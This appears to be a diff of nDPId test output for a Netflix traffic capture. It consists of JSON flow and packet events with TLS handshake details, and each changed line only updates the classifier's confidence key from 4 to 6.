-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} 